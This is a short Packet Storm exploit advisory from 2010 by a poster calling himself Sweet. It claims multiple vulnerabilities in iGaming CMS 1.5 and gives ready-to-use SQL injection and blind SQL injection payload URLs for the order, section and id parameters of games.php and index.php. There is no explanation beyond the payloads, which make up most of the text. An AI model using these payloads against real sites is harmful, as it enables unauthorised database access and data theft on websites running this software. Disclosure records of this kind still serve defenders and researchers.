iGaming CMS 1.5 SQL Injection

2010-08-28T00:00:00
ID PACKETSTORM:93248
Type packetstorm
Reporter Sweet
Modified 2010-08-28T00:00:00

Description

                                        
                                            `############################################################################  
# #  
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities #  
# #  
# Date: 27/08/2010 #  
# #  
# Author: Sweet #  
# #  
# Contact : charif38@hotmail.fr #  
# #  
# Software Link: http://www.igamingcms.com/ #  
# #  
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5 #  
# #  
# Version:1.5 #  
# #  
# Tested on: WinXp sp3 #  
# #  
# Risk : hight #  
# #  
# #  
# Description : iGaming CMS is a content management #  
# system designed for gaming websites. #  
# #  
# #  
# #  
############################################################################  
  
1-SQL injection:  
  
http://www.example.com/igamingpath/games.php?order=1[SQLi]&section=111-222-1933email@address.tst&sort=desc  
  
2-Blind injection:  
  
http://www.example.com/igamingpath/games.php?order=title&section=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc  
  
http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0  
  
  
thx to Milw0rm.com , JF - Hamst0r - Keystroke , inj3ct0r.com , exploit-db.com  
  
Saha Ftourkoum et 1,2,3 viva L'Algerie :))  
  
`